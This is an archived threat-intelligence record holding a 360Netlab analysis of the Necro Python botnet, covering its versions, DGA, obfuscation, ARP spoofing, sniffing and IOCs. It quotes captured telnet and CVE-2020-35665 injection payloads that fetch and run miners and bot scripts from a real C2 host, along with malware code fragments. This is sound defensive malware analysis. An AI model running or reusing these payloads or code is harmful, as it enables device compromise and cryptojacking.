{
	"id": "d46c4716-c9fb-4a48-88a0-38f97888b93f",
	"created_at": "2026-04-06T00:17:08.854334Z",
	"updated_at": "2026-04-10T03:25:15.748847Z",
	"deleted_at": null,
	"sha1_hash": "ea895a104e3d92b8bd7fc5cf6fd772f3a0320751",
	"title": "Necro is going to version 3 and using PyInstaller and DGA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1243211,
	"plain_text": "Necro is going to version 3 and using PyInstaller and DGA\r\nBy jinye\r\nPublished: 2021-01-22 · Archived: 2026-04-05 23:34:06 UTC\r\nOverview.\r\nNecro is a classic family of botnet written in Python that was first discovered in 2015, at the beginning, it targeted\r\nWindows systems and often tagged by security vendors as Python.IRCBot and called N3Cr0m0rPh (Necromorph)\r\nby the author himself.\r\nSince January 1, 2021, 360Netlab's BoTMon system has continued to detect new variants of the family, with three\r\nversions of the sample being detected, and the latest version using DGA to generate C2 domains against detection.\r\nAll the 3 versions target Linux devices.\r\nThe key points of this blog are as follows.\r\n1. In terms of propagation methods, Necro supports multiple methods and continues to integrate new publicly\r\navailable 1-day vulnerabilities with a high attack capability.\r\n2. The latest version uses the DGA technique to generate C2 domain names and the Python scripts are also\r\nheavily obfuscated to combat static analysis.\r\n3. The latest 2 versions distribute Python programs together with ELF programs packaged with PyInstaller at\r\nthe same time in order to ensure that they can be executed on victim machines that do not have Python2.\r\n4. We suspect same actor behind all three versions.\r\nAt the time of writing, we note that two security vendors have reported Necro botnet PythonCryptoMinter\r\nFreakOut, but they both describe the second version that has stopped spreading.\r\nCapture\r\nOur Anglerfish honeypot system captured two propagation methods: one uses traditional telnet weak password\r\nand the other one utilizes an 1-day vulnerability (CVE-2020-35665). The following is a hit record from our\r\nhoneypot.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 1 of 15\n\nThe following is the payload being used for weak telnet password.\r\nroot\r\npassword\r\nenable\r\nsystem\r\nshell\r\nsh\r\necho -e '\\x41\\x4b\\x34\\x37'\r\nwget http://aspjobjreorejborer.com/mirai.armexport ARGS=\"-o aveixucyimxwcmph.xyz:9050\";\r\nLINE=\"killall -9 .sshd||pkill -9 .sshd_;\r\n[ ! -f /tmp/.pidfile ] \u0026\u0026 echo \u003e /tmp/.pidfile;\r\nnohup .sshd $ARGS \u003e /dev/null||nohup .sshd_ $ARGS \u003e /dev/null \u0026\";\r\ngrep -q \"$LINE\" ~/.bashrc||echo \"$LINE\" \u003e\u003e ~/.bashrc;\r\ncurl http://aveixucyimxwcmph.xyz/xmrig1 -O||wget http://aveixucyimxwcmph.xyz/xmrig1 -O .sshd_;\r\nmv -f .sshd_ .sshd_;\r\nchmod 777 .sshd_;\r\ncurl http://aveixucyimxwcmph.xyz/xmrig -O xmrig||wget http://aveixucyimxwcmph.xyz/xmrig -O xmrig;\r\nmv -f xmrig .sshd;\r\nchmod 777 .sshd;\r\nchmod +x ~/.bashrc;\r\n~/.bashrc;\r\ncd /tmp||php -r \"file_put_contents(\".benchmark\", file_get_contents(\"http://aveixucyimxwcmph.xyz/.benchmark\"));\";\r\ncurl http://aveixucyimxwcmph.xyz/.benchmark -O;\r\ncurl http://aveixucyimxwcmph.xyz/.benchmark.py -O;\r\nphp -r \"file_put_contents(\".benchmark.py\", file_get_contents(\"http://aveixucyimxwcmph.xyz/.benchmark.py\"));\";\r\nwget http://aveixucyimxwcmph.xyz/.benchmark -O .benchmark;\r\nwget http://aveixucyimxwcmph.xyz/.benchmark.py -O .benchmark.py;\r\nchmod 777 .benchmark.py;\r\nchmod 777 .benchmark;\r\npython .benchmark.py||python2 .benchmark.py||python2.7 .benchmark.py||./.benchmark||./.benchmark.py \u0026\r\nThe following is the payload when exploiting the 1-day vulnerability CVE-2020-35665.\r\nGET /include/makecvs.php?Event=`export ARGS=\"-o aveixucyimxwcmph.xyz:9050\"\r\nLINE=\"killall -9 .sshd||pkill -9 .sshd_\r\n[ ! -f /tmp/.pidfile ] \u0026\u0026 echo \u003e /tmp/.pidfile\r\nnohup .sshd $ARGS \u003e /dev/null||nohup .sshd_ $ARGS \u003e /dev/null \u0026\"\r\ngrep -q \"$LINE\" ~/.bashrc||echo \"$LINE\" \u003e\u003e ~/.bashrc\r\ncurl http://aveixucyimxwcmph.xyz/xmrig1 -O||wget http://aveixucyimxwcmph.xyz/xmrig1 -O .sshd_\r\nmv -f .sshd_ .sshd_\r\nchmod 777 .sshd_\r\ncurl http://aveixucyimxwcmph.xyz/xmrig -O xmrig||wget http://aveixucyimxwcmph.xyz/xmrig -O xmrig\r\nmv -f xmrig .sshd\r\nchmod 777 .sshd\r\nchmod +x ~/.bashrc\r\nhttps://blog.netlab.360.com/necro/\r\nPage 2 of 15\n\n~/.bashrc\r\ncd /tmp||php -r \"file_put_contents(\\\".benchmark\\\", file_get_contents(\\\"http://aveixucyimxwcmph.xyz/.benchmark\\\")\r\ncurl http://aveixucyimxwcmph.xyz/.benchmark -O\r\ncurl http://aveixucyimxwcmph.xyz/.benchmark.py -O\r\nphp -r \"file_put_contents(\\\".benchmark.py\\\", file_get_contents(\\\"http://aveixucyimxwcmph.xyz/.benchmark.py\\\"));\"\r\nwget http://aveixucyimxwcmph.xyz/.benchmark -O .benchmark\r\nwget http://aveixucyimxwcmph.xyz/.benchmark.py -O .benchmark.py\r\nAs you can see from the payload above, in addition to downloading and executing the original Python script\r\n(.benchmark.py), exp will also attempt to download and execute the PyInstaller-packaged ELF file (.benchmark),\r\na tactic introduced by the authors since version 2 to improve the execution success rate. Because Python 2 has\r\nreached EOL (end-of-life), some victim machines lack this runtime environment, and Python programs packaged\r\nwith PyInstaller will become standalone ELFs that can be executed normally even without a Python environment\r\non the target machine.\r\nIt is worth noting that vulnerability CVE-2020-35665 was made public on December 23, 2020, only 8 days after\r\nwe first caught its exploitation, which shows that the authors are very \"active\" in the use of the new vulnerability.\r\nIn addition to the Necro sample, the above exp will also download the mining program xmrig and xmrig1.\r\nWhen looking up the C2 in our database, we found that the same download server has also been used for the\r\ndownload of mirai and some Windows malicious exe programs, indicating that the authors of Necro are operating\r\nmultiple families of botnet at the same time.\r\nInfection Scale\r\nTapping in our DNSMon passivedns data, we can see the statistics of the two C2 domains used in version 2 and 3.\r\nRight now both counts are in 2 digits. But keep in mind that our pdns represents only a small subset of the global\r\ndns traffic, and based on past experiences, we won’t be surprised if the actual infected hosts is a much much\r\nbigger number.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 3 of 15\n\nHere are the resolution statistics of version 2 C2 domain, we can see that the count of this domain name has\r\npassed the stable period and is in a declining state.\r\nBelow are the resolution statistics for version 3 domains. You can see that the resolution volume is rising, which\r\nmeans this version is active.\r\nSample analysis\r\nThrough the analysis, we found that the Necro samples captured in 2021 can be divided into 3 versions, and there\r\nare significant differences between each version in terms of propagation method, code obfuscation and C2\r\nschema, where version 1 (necr0.py) to version 2 (out.py) are mainly code structure adjustments with an increase in\r\nobfuscation. From version 2 to version 3, the difference has increased, not only the code obfuscation has increased\r\nhttps://blog.netlab.360.com/necro/\r\nPage 4 of 15\n\nsignificantly, but also C2 has changed from hardcoded domain names to using the DGA. In addition, some n-day\r\nvulnerabilities have been added to version 3 in terms of propagation methods.\r\nVersion 1\r\nBecause version 1 was named necro.py by the author, we named the family Necro. In terms of code obfuscation,\r\nversion 1 only partially obfuscates the code.\r\nIts C2 information is simply encoded and stored, and after several inverse decodes can be easily obtained as\r\nfollows.\r\nirc server: '45.145.185.229'\r\nchannel: '#necro'\r\nkey: 'm0rph'\r\nReadable DDoS attack-related command strings can be found in the original sample.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 5 of 15\n\nFrom these command strings we can see that Necro is a botnet for DDoS attacks, C2 protocol based on IRC,\r\nsupports attacks including both the common udpflood, synflood, slowloris, httpflood these, but also an uncommon\r\nmethod of amp attack.\r\nVersion 2\r\nVersion 2 (out.py) is comparable to version 1 in terms of obfuscation, but there is a change in vulnerability\r\nexploitation to include the Zend Framework (known as CVE-2021-3007).\r\nIt is worth noting that the vulnerability was only revealed on January 4, 2021, which again shows that the authors\r\nof Necro were very \"aggressive\" in exploiting the new vulnerability.\r\nIn terms of C2 storage, version 2 is same as version 1.\r\nirc server: 'gxbrowser.net'\r\nchannel: '#update'\r\nkey: 'N3Wm3W'\r\nVersion3\r\nVersion 3's were detected to be propagated with benchmark.py names. Compared to the first two versions, the\r\nbiggest change in version 3 is the use of DGA to generate C2 domain names, the specific algorithm refer to the\r\nDGA code behind, the following is a simulation of the algorithm to generate part of the domain name:\r\navEiXUcYimXwcMph.xyz\r\navEiXUcYimXwcMph.xyz\r\navEiXUcYimXwcMph.xyz\r\naoRmVwOaTOGgYqbk.xyz\r\naoRmVwOaTOGgYqbk.xyz\r\naoRmVwOaTOGgYqbk.xyz\r\nMasEdcNVYwedJwVd.xyz\r\nMasEdcNVYwedJwVd.xyz\r\nhttps://blog.netlab.360.com/necro/\r\nPage 6 of 15\n\nMasEdcNVYwedJwVd.xyz\r\nsuBYdZaoqwveKRlQ.xyz\r\n...\r\nThrough our own Passive DNS system(link https://passivedns.cn), we see that the 1st domain name\r\naveixucyimxwcmph.xyz generated by this DGA algorithm is enabled and is also used as the domain name of the\r\ndownload server.\r\n2021-01-11 11:49:28 2021-01-20 03:47:28 372 aveixucyimxwcmph.xyz A 193.239.147.22\r\n2021-01-11 20:11:02 2021-01-11 20:11:03 2 aveixucyimxwcmph.xyz TXT \"v=spf1 includ\r\n2021-01-11 20:11:01 2021-01-11 20:11:03 3 aveixucyimxwcmph.xyz MX eforward4.regi\r\n2021-01-11 20:11:01 2021-01-11 20:11:03 3 aveixucyimxwcmph.xyz MX eforward5.regi\r\n2021-01-11 20:11:01 2021-01-11 20:11:03 3 aveixucyimxwcmph.xyz MX eforward2.regi\r\n2021-01-11 20:11:01 2021-01-11 20:11:03 3 aveixucyimxwcmph.xyz MX eforward1.regi\r\n2021-01-11 20:11:01 2021-01-11 20:11:03 3 aveixucyimxwcmph.xyz MX eforward3.regi\r\nOn January 20, 2021, in the latest version 3 sample the authors made another change to the DGA algorithm,\r\nmodifying the seeds from 3 to 4096, and also started using SSL to encrypt the communication data.\r\nAnother change in version 3 is that the code has been obfuscated more severely. Not only have all custom objects\r\nbeen replaced with random characters, but even the strings have been encoded in this way with\r\nbase64.encode(zlib.compress(plain_string)), resulting in samples that no longer have readable, meaningful strings,\r\nas shown in the following figure.\r\nIn terms of propagation methods, version 3 adds more vulnerability exploits, which can be seen in the decoded\r\nstrings as follows.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 7 of 15\n\nThere is no change in the supported DDoS attack methods in version 3, only the command string is encoded, and\r\nthe decoded DDoS command string is as follows.\r\nSample history\r\nWe can see that Necro was developed as early as 2015 and is called N3Cr0m0rPh (Necromorph) by the authors.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 8 of 15\n\nWe were able to correlate a batch of early Necro samples for Windows from the sample library, all exe files, which\r\nalso happened to date back to 2015, matching the version information in version 1. From these clues, we can tell\r\nthat Necro first targeted the Windows platform, and then perhaps the natural cross-platform characteristics of\r\nPython programs, or the existence of a large number of vulnerabilities in the existing network of Linux machines\r\n(IoT devices, cloud servers, etc.), which inspired the Necro authors to move on to Linux devices.\r\nOthers\r\nSince some of the Necro samples are distributed as PyInstaller packages, here is a brief description of how to\r\nrestore a readable .py script by means of unpacking, decompiling, and unobfuscating.\r\nUnpacking\r\nTake version 3 as an example, after unpacking the pydata data extracted from the ELF samples with the\r\nopen source tool pyinstxtractor, you can get the .so dynamic library, python library and bytecode file\r\n.benchmark.pyc that the original python script depends on.\r\nhttps://blog.netlab.360.com/necro/\r\nPage 9 of 15\n\nDecompiling pyc\r\nBy decompiling .pyc bytecode with uncompyle6, we can get the final python script. By comparing the\r\npython script .benchmark.py from the same downloader, we find that it is the same as the decompiled .py\r\nscript, so we conclude that .benchmark.py is the original script before packaging.\r\nString decryption\r\nNecro uses a simple zip compression with an alias algorithm to encrypt the string, take the following code\r\nas an example, first decompress and then alias to get the decrypted string value ‘8.8.8.8'\r\nxor_crypt(zlib.decompress(b'\\x78\\x9c\\xab\\xac\\x8d\\x72\\xf7\\xca\\x96\\x06\\x00\\x0a\\xf1\\x02\\x68'))\r\ndef xor_crypt(s):\r\n xor_key = [65, 83, 98, 105, 114, 69, 35, 64, 115, 103, 71, 103, 98, 52]\r\n return ('').join([ chr(ord(c) ^ xor_key[(i % len(xor_key))]) for i, c in enumerate(s) ])\r\nDeforming\r\nThe python script will first call the repack() function after it starts to deform the current file. The\r\ndeformation algorithm is to take an object name (possibly a class, variable name, function name) from the\r\nobj_name_list table (which holds the custom object names in the file) in turn, then generate an 8-bit\r\nrandom string, and replace the corresponding object name in the file with this 8-bit random string. The\r\nresult is that no more readable object names can be found in the original file. Because this practice is\r\nhttps://blog.netlab.360.com/necro/\r\nPage 10 of 15\n\nirreversible, we can only speculate on the meaning of each function and variable from the code function,\r\nreferring to earlier versions of the code, we basically figured out the code function.\r\ndef __init__(self):\r\n ...\r\n self.repack() #repack bot before we install\r\n self.install() #Install\r\ndef repack(self):\r\n try:\r\n fh_myself=open(argv[0],\"r\")\r\n _pyload=fh_myself.read()\r\n fh_myself.close()\r\n obj_name_list=['localhost_irc','gen_random_8char'....]\r\n for obj_name in obj_name_list:\r\n _pyload=_pyload.replace(obj_name,self.gen_random_8char(8))\r\n new_fh_myself=open(argv[0],\"w\")\r\n new_fh_myself.write(_pyload)\r\n new_fh_myself.close()\r\n except:\r\n pass\r\nARP Spoofing and Traffic Sniffing\r\nNecro also supports ARP spoofing and network traffic sniffing. ARP spoofing is designed to disguise the\r\nvictim machine as a gateway, the code is shown below.\r\ndef create_pkt_arp_poison():\r\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.SOCK_RAW)\r\n s.bind((\"wlan0\", 0))\r\n \r\n while(1):\r\n for lmfao in getPoisonIPs():\r\n src_addr = get_src_mac()\r\n dst_addr = lmfao[0]\r\n src_ip_addr = get_default_gateway_linux()\r\n dst_ip_addr = lmfao[1]\r\n dst_mac_addr = \"\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n payload = \"\\x00\\x01\\x08\\x00\\x06\\x04\\x00\\x02\"\r\n checksum = \"\\x00\\x00\\x00\\x00\"\r\n ethertype = \"\\x08\\x06\"\r\n s.send(dst_addr + src_addr + ethertype + payload+src_addr + src_ip_addr\r\n + dst_mac_addr + dst_ip_addr + checksum)\r\n time.sleep(2)\r\nhttps://blog.netlab.360.com/necro/\r\nPage 11 of 15\n\nThe buggy code executes in a separate thread, reading /proc/net/arp every 2 seconds to get the latest ARP\r\nneighbors, and then sending them ARP responses pretending to be the gateway, with the goal of making the other\r\nparty believe that the machine it is running on is the gateway. The author may have done this to achieve man-in-the-middle hijacking, but we have not seen any more code related to man-in-the-middle communication yet, so the\r\nfeature is probably still under development.\r\nThe sample will start a sniffing thread when it starts. Sniffing mainly targets the TCP traffic of the victim machine,\r\nwhich is controlled by the C2 directive (.sniffer-resume). Once enabled, all TCP traffic not from the following\r\nports will be logged and reported to C2's port 1337: \"1337, 6667, 23, 443, 37215, 53, 22\".\r\nThe sample will start a sniffing process when it starts, and report all the traffic of interest in the intranet to port\r\n1337 of the cc server.\r\nC2 Infrastructure\r\nStarting from the download server domain aveixucyimxwcmph.xyz, we expand more information about the IoC\r\nthrough our graph system and sucessfully linked all c2s from the three different versions.\r\nAmong them, the C2 domain gxbrowser.net in version 2 has also resolved to C2 45.145.185.229 in version 1, and\r\nthe IP 193.239.147.224 resolved by the C2 domain aveixucyimxwcmph.xyz in version 3 has also been used by\r\ngxbrowser.net, which means that the authors behind the current 3 versions of Necro botnet are very likely same\r\nperson\r\nAll the Necro related domains have been blocked by our DNSmon system.\r\nReaders are always welcomed to reach us on twitter or email us to netlab at 360 dot cn.\r\nIOC\r\nhttps://blog.netlab.360.com/necro/\r\nPage 12 of 15\n\nC2\r\n45.145.185.83\r\n193.239.147.224\r\ngxbrowser.net\r\naveixucyimxwcmph.xyz\r\nDownload URL\r\n# Version 1\r\n http://45.145.185.229/necr0.py\r\n# Version 2\r\n http://gxbrowser.net/out\r\n http://gxbrowser.net/out.py\r\n# Version 3\r\n http://aveixucyimxwcmph.xyz/.benchmark\r\n http://aveixucyimxwcmph.xyz/.benchmark.py\r\n#　Others\r\n http://gxbrowser.net/xmrig\r\n http://gxbrowser.net/xmrig1\r\n http://aveixucyimxwcmph.xyz/xmrig1\r\n http://45.145.185.229/bins/nginx.html/keksec.x86\r\n http://45.145.185.229/bins/nginx.html/keksec.spc\r\n http://45.145.185.229/bins/nginx.html/keksec.sh4\r\n http://45.145.185.229/bins/nginx.html/keksec.ppc\r\n http://45.145.185.229/bins/nginx.html/keksec.mpsl\r\n http://45.145.185.229/bins/nginx.html/keksec.mips\r\n http://45.145.185.229/bins/nginx.html/keksec.m68k\r\n http://45.145.185.229/bins/nginx.html/keksec.i586\r\n http://45.145.185.229/bins/nginx.html/keksec.arm\r\n http://45.145.185.229/bins/nginx.html/keksec.arm7\r\n http://45.145.185.229/bins/nginx.html/keksec.arm5\r\n http://45.145.185.229/bins/keksec.x88_64\r\n http://45.145.185.229/bins/keksec.x86\r\n http://45.145.185.229/bins/keksec.x64\r\n http://45.145.185.229/bins/keksec.spc\r\n http://45.145.185.229/bins/keksec.sh4\r\n http://45.145.185.229/bins/keksec.ppc\r\n http://45.145.185.229/bins/keksec.mpsl\r\n http://45.145.185.229/bins/keksec.mips\r\n http://45.145.185.229/bins/keksec.mips64\r\n http://45.145.185.229/bins/keksec.m68k\r\n http://45.145.185.229/bins/keksec.i586\r\nhttps://blog.netlab.360.com/necro/\r\nPage 13 of 15\n\nhttp://45.145.185.229/bins/keksec.arm\r\n http://45.145.185.229/bins/keksec.arm7\r\n http://45.145.185.229/bins/keksec.arm5\r\n http://45.145.185.229/update.sh\r\nDGA\r\nimport random\r\ndef gen_random_str(_range):\r\n return ('').join(random.choice('abcdefghijklmnopqoasadihcouvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for _ in range(_\r\ndef gen_cc(time):\r\n random.seed(a=5236442 + time)\r\n return gen_random_str(16) + '.xyz'\r\ndef gen_DGA():\r\n i = 0\r\n while 1:\r\n for _ in range(3):\r\n try:\r\n print(gen_cc(i))\r\n except:\r\n pass\r\n if i \u003e= 2048:\r\n i = 0\r\n i += 1\r\ngen_DGA()\r\nC2 decryption algorithm\r\nself.irc_server=b64decode(b64decode(\"34653437353533303465343435353331346537613535333035613434353533303465353434\r\nself.server_port=6667 #Server port\r\nself.channel=b64decode(b64decode(\"346534343662376134643661346433313465366434643331346635343464376134653437343533\r\nself.channel_key==b64decode(b64decode(\"3465366134393331346534343531373934653761366233323464376135313333346536613\r\nReferences\r\nhttps://blog.netlab.360.com/necro/\r\nPage 14 of 15\n\nhttps://www.imperva.com/blog/python-cryptominer-botnet-quickly-adopts-latest-vulnerabilities/\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-28188\r\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-3007\r\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-7961\r\nSource: https://blog.netlab.360.com/necro/\r\nhttps://blog.netlab.360.com/necro/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/necro/"
	],
	"report_names": [
		"necro"
	],
	"threat_actors": [
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434628,
	"ts_updated_at": 1775791515,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea895a104e3d92b8bd7fc5cf6fd772f3a0320751.pdf",
		"text": "https://archive.orkl.eu/ea895a104e3d92b8bd7fc5cf6fd772f3a0320751.txt",
		"img": "https://archive.orkl.eu/ea895a104e3d92b8bd7fc5cf6fd772f3a0320751.jpg"
	}
}